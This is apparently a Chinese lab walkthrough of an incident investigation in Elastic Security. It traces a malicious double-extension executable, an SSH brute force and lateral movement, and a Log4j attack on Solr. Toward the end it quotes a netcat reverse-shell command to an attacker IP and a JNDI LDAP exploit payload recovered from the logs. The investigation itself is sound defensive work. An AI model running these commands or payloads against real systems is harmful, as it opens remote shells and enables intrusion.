Elastic日志分析

news2024/11/23 22:14:57

目录

    • 介绍
    • 步骤

介绍

Elasticsearch 是在 Apache Lucene 上构建的分布式搜索和分析引擎。Elasticsearch常用于日志分析、全文搜索、安全智能、业务分析和运维智能使用案例。

可以使用 JSON 文档形式或通过 API 等将数据发送到 Elasticsearch。 Elasticsearch 自动存储原始文档,并在集群的索引中添加该文档的可搜索引用。然后,您就可以使用 Elasticsearch API 搜索和检索该文档。还可以利用可视化数据并构建交互式控制面板。

步骤

在操作机中,打开FireFox,输入about:config打开配置页面,输入network.security.ports.banned.override,将值更改为5601
在这里插入图片描述

打开目标机IP:5601进入elastic日志分析系统,利用账户名elastic密码elastic登陆
在这里插入图片描述
在这里插入图片描述

点击左上角菜单,选中SecurityOverview模块
在这里插入图片描述

点击alerts打开警报模块
在这里插入图片描述

点击Add Fliter,在Field栏输入process.nameOperator选择is,可以查看到引起alert的所有程序(也可以不筛选,直接在KQL处输入file.name: *.*.*查找)
在这里插入图片描述

根据系统总结筛选的结果,可以分析出有一个双重扩展名的程序Acount_details.pdf.exe,在下方使用TimeStamp进行排序可得最先出现Acount_details.pdf.exe程序的用户名是ahmed
在这里插入图片描述

主机名和另一个执行恶意程序的用户名也显示在此处
在这里插入图片描述

点击左上角菜单,选中analyticsdiscover模块,点击切换为Winlogbeat,输入file.name: *.*.exe进行确认
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
返回Securityalerts模块,输入file.name : "Acount_details.pdf.exe"语句进行筛选,以TimeStamp Sort old-new排序,在最早时间线处点击盒子图标Analyze event进行自动日志分析
在这里插入图片描述

点击NetWork,找到最早时间线的Network start,点击加密的字符串
在这里插入图片描述

打开连接详情后可以查看到攻击者IP
在这里插入图片描述

analyticsdiscover模块,切换至winlogbeat,输入process.name : "Acount_details.pdf.exe" and user.name: "ahmed"KQL命令,筛选ip
在这里插入图片描述

返回Securityalerts模块,输入file.name:*.dll and file.size:8704 and process.name: "Acount_details.pdf.exe"进行筛选
在这里插入图片描述

点击盒子图标Analyze event进行自动日志分析
在这里插入图片描述

点击当前连接的file,筛选两个file creation
在这里插入图片描述

分析得知,攻击者通过恶意文件下载了mCblHDgWP.dll这个dll文件
在这里插入图片描述

返回Securityalerts模块,输入process.pid : 10716 and process.name : "cmd.exe"筛选
在这里插入图片描述

点击盒子图标Analyze event进行自动日志分析
点击cmd.exe,查看进程信息,进程PID是10716,具有NT AUTHORITY权限,父进程ID是8856
在这里插入图片描述

点击rundll32.exe查看进程信息,进程PID为8856,是PID10716的父进程
在这里插入图片描述

点击rundll32.exeregistry查看注册表
在这里插入图片描述

analyticsdiscover模块,切换至logs,以registry.path为类型,输入process.name: "rundll32.exe" and process.pid : 8856筛选,进一步确认
在这里插入图片描述

返回Securityhost模块,输入KQL语句process.name: "powershell.exe" and process.pid : 8836筛选,点击盒子图标Analyze event进行自动日志分析
在这里插入图片描述

点击Powershell.exe,查看file change,powershell进程更改的文件名为ModuleAnalysisCache
在这里插入图片描述
在这里插入图片描述

返回Securityhost模块,输入process.name: "powershell.exe" and process.pid : 11676,选中event.action为File created的条目进行查看,点击盒子图标Analyze event进行自动日志分析
在这里插入图片描述

点击Powershell.exefile,选择时间线第一个创建的文件信息
在这里插入图片描述

查看信息后得知,_PSScriptPolicyTest_bymwxuft.3b5.ps1是PID为11676创建的第一个.ps1扩展名的文件
在这里插入图片描述

返回Securityhost模块,针对每个主机的IP进行查询
在这里插入图片描述

Windows服务器的LAN是192.168.10.0/24
在这里插入图片描述

可以得知,elastic的LAN是192.168.20.0/24,CentOS的LAN是192.168.30.0/24,ubuntu的LAN是192.168.10.0/24,localhost.localdomain的LAN是192.168.122.0/24。只有ubuntu服务器和windows服务器的LAN是相同的
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在ubuntu服务器的Authentications中,有大量的用户登陆认证错误,可以推断在ubuntu服务器中发生了暴力破解攻击。
在这里插入图片描述

通过日志分析,针对既有登录失败又有登陆成功的用户名,只有salemroot用户。其中最后成功登陆的IP是Windows服务器,判断利用Windows服务器作为跳板进行了横向渗透。
在这里插入图片描述

返回analyticsdiscover模块,使用KQL命令host.name: "ubuntu" and log.file.path : "/var/log/auth.log" and system.auth.ssh.event : "Accepted",过滤器使用user.name筛选。salem是暴力破解后登录的用户名
在这里插入图片描述
返回Securityhost,点击events,使用KQL语句host.name: "ubuntu" and user.name: "salem" and process.args: wget,过滤ubuntu服务器的用户名salem的进程命令为wget的事件
在这里插入图片描述

针对时间线最先发生的事件,点击盒子图标Analyze event进行自动日志分析,点击wget即可查看process.args的cve编号
在这里插入图片描述

Securityhost,点击events,利用KQL命令host.name: "ubuntu" and user.name: "salem" and process.args : "python3"筛选,在时间线最先发生的事件点击盒子图标Analyze event进行自动日志分析
在这里插入图片描述

在分析中,点击python3file,可以明确看到python3进程创建了3个文件,均为同一时间
在这里插入图片描述

Securityhost,点击events,利用KQL命令user.name: root and process.pid: 3011筛选命令执行信息,选择event.actionexec的条目
在这里插入图片描述

点击盒子图标Analyze event进行自动日志分析,可以分析出执行的命令是bash -i
在这里插入图片描述

返回SecurityAlerts模块,输入KQL命令signal.rule.name: "Netcat Network Activity",可以得知服务器主机名是CentOS
在这里插入图片描述

点击盒子图标Analyze event进行自动日志分析,点击运行的进程nc,可以看到用户名为solr和父进程PID
在这里插入图片描述

可以在这个进程处,确认反弹shell的执行命令nv -e /bin/bash 192.168.1.10 9999
在这里插入图片描述

对父进程PID进一步溯源,是java程序调起的nc命令
在这里插入图片描述

analyticsdiscover模块,点击切换为filebeat,输入KQL语句log.file.path:/var/solr/logs/solr.log,在过滤器处输入message筛选向服务器提交信息的条目
在这里插入图片描述

根据条目得知,发生log4j攻击的路径为/admin/cores,,提交的params参数为foo,JNDI载荷为{foo=${jndi:ldap://192.168.1.10:1389/Exploit}}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2082914.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

免杀笔记 ---> CS特性角度看Veh免杀

前一段时间在玩WBGlIl大佬以前发的一篇过卡巴的思路(虽然现在不过了),但是在研究的时候发现如果我们我们在没有CS的特性基础下直接看这篇文章,或者说你去魔改他的脚本是不太可能的,刚好就来普及一下这个CS的一些简单特…

胃癌TMEscore的前瞻性临床研究(TME)

目录 ①关于胃癌TME分型介绍 ②TMEscore计算-TMEscore包 ③关于TMEscore的前瞻性研究 ①关于胃癌TME分型介绍 Tumor Microenvironment Characterization in Gastric Cancer Identifies Prognostic and Immunotherapeutically Relevant Gene Signatures - PubMed (nih.gov) …

【Linux —— POSIX信号量 - 基于环形队列的生产消费模型】

Linux —— POSIX信号量 - 基于环形队列的生产消费模型 POSIX信号量信号量的概念POSIX信号量的类型信号量的操作 POSIX信号量函数基于环形队列的生产消费模型设计思路同步和安全性代码 POSIX信号量 信号量的概念 POSIX信号量是一种用于进程和线程之间同步的机制,主…

【网络】网络层协议——IP协议

目录 1.TCP和IP的关系 2.IP协议报文 2.1. 4位首部长度,16位总长度,8位协议 2.2. 8位生存时间 ,32位源IP地址和32位目的IP地址 3.IP地址的划分 3.1.IP地址的表现形式 3.2.旧版IP地址的划分 3.2.1.旧版IP地址的划分思路 3.2.2.分类划…

各种注意力评分函数的实现

预备知识 本文基于MXNet进行实现,需要对于注意力机制有一定初步了解。也需要对Python有足够了解。 另外这里稍加说明,在注意力机制中,本质上是“注意”的位置,即加权计算后进行Softmax回归的结果。在Nadaraya-Watson核回归中&am…

问界M7 Pro发布,又做回纯视觉?华为智驾系统这3年到底功夫下在哪?

北京时间8月26日下午14:00,华为又公布了一款新问界车型,时至今日,华为问界家族已有三大款,细分9个系列车型(从动力方面看,各自都分为增程和纯电两种版本)。 1个多小时的发布会上,除…

Zabbix和Prometheus

1.Zabbix 1.1 Zabbix监控获取数据的方式 zabbix-agent 适用于服务器,主机监控 SNMP协议 适用于网络设备(交换机、路由器、防火墙) IPMI协议 适用于监控硬件设备信息(温度、序列号) JMX协议 适用于Java应用监控 1.2 …

基于SSM+微信小程序的跑腿平台管理系统(跑腿3)(源码+sql脚本+视频导入教程+文档)

👉文末查看项目功能视频演示获取源码sql脚本视频导入教程视频 1 、功能描述 基于SSM微信小程序的跑腿平台管理系统实现了管理员、接单员及用户三个角色。 1、管理员实现了首页、个人中心、管理员管理、基础数据管理、接单详情、跑腿任务管理等。 2、接单员实现了…

C++ TinyWebServer项目总结(14. 多线程编程)

早期Linux不支持线程,直到1996年,Xavier Leroy等人开发出第一个基本符合POSIX标准的线程库LinuxThreads,但LinuxThreads效率低且问题多,自内核2.6开始,Linux才开始提供内核级的线程支持,并有两个组织致力于…

离线环境下的 Prometheus 生态部署攻略

一、前言 在当今高度数字化的世界中,监控系统的稳定性和可靠性对于确保业务连续性和性能优化至关重要。特别是在网络隔离或无互联网接入的局域网环境下,离线部署监控解决方案成为了一种必要且挑战性的任务。本文将深入探讨如何在离线环境中成功部署 Pro…

深圳保障房、商品房、小产权房子类型对比

摘要: 整理了我认知以内的深圳房子类型,有安居房,可售人才房,共有产权房、配售型保障房、商品房、统建楼、农民房的区别。如果数据存疑,可以多方对比论证,我也主要靠百度。 我发现我很多同事是非深户&#…

秋招突击——算法练习——8/26——图论——200-岛屿数量、994-腐烂的橘子、207-课程表、208-实现Trie

文章目录 引言正文200-岛屿数量个人实现 994、腐烂的橘子个人实现参考实现 207、课程表个人实现参考实现 208、实现Trie前缀树个人实现参考实现 总结 引言 正文 200-岛屿数量 题目链接 个人实现 我靠,这道题居然是腾讯一面的类似题,那道题是计算最…

《分析模式》2024中译本-前言-01(加红色标注)

写在前面 今天开始,我们逐渐发布一些《分析模式》2024中译本的译文。 红色字体标出的文字,表示我认为之前的译本可能会让读者产生误解的地方。 感兴趣的读者,可以对照之前译本以及原文,捉摸一下为什么要标红。 主要原因当然是…

基于SpringBoot+Vue+MySQL的小区物业管理系统

系统背景 在当今信息化高速发展的时代,小区物业管理正经历着从传统模式向智能化、高效化转型的深刻变革。这一转变的核心驱动力,正是小区物业管理系统的全面智能化升级。该系统不仅极大地提升了物业管理的效率与精确度,还深刻重塑了物业与业主…

数分基础(03-1)客户特征分析

文章目录 客户特征分析1. 数据集2. 思路与步骤2.1 特征工程2.2 识别方法2.3 可视化 3. 分析准备3.1 读取数据集3.2 识别不同客户群体3.2.1 使用K-Means聚类进行初步细分3.2.2 关于聚类方法(1)特征缩放1)平衡特征对模型的影响力,避…

通过ICMP判断网络故障

一、ICMP协议 Internet控制消息协议ICMP(Internet Control Message Protocol)是IP协议的辅助协议。 ICMP协议用来在网络设备间传递各种差错和控制信息,对于收集各种网络信息、诊断和排除各种网络故障等方面起着至关重要的作用。 TypeCode描述备注00Echo Replyping…

C++从入门到起飞之——list使用 全方位剖析!

​ 🌈个人主页:秋风起,再归来~🔥系列专栏:C从入门到起飞 🔖克心守己,律己则安 目录 1、迭代器 2、push_back与emplace_back 3、list成员函数sort与库sort比较 4、merge 5、uniqu…

2024117读书笔记|《李煜词(果麦经典)》——一壶酒,一竿身,快活如侬有几人?一片芳心千万绪,人间没个安排处

2024117读书笔记|《李煜词(果麦经典)》——一壶酒,一竿身,快活如侬有几人?一片芳心千万绪,人间没个安排处 《李煜词(果麦经典)》李煜的词很美,插图也不错,很值…

基于粒子群优化算法的六自由度机械臂三维空间避障规划

摘要:本研究旨在解决机械臂在复杂环境中避障路径规划的问题。本文提出了一种利用粒子群优化算法(PSO)进行机械臂避障规划的方法,通过建立机械臂的运动模型,将避障问题转化为优化问题。PSO算法通过模拟群体中个体的社会…

ggml 简介

ggml是一个用 C 和 C 编写、专注于 Transformer 架构模型推理的机器学习库。该项目完全开源,处于活跃的开发阶段,开发社区也在不断壮大。ggml 和 PyTorch、TensorFlow 等机器学习库比较相似,但由于目前处于开发的早期阶段,一些底层…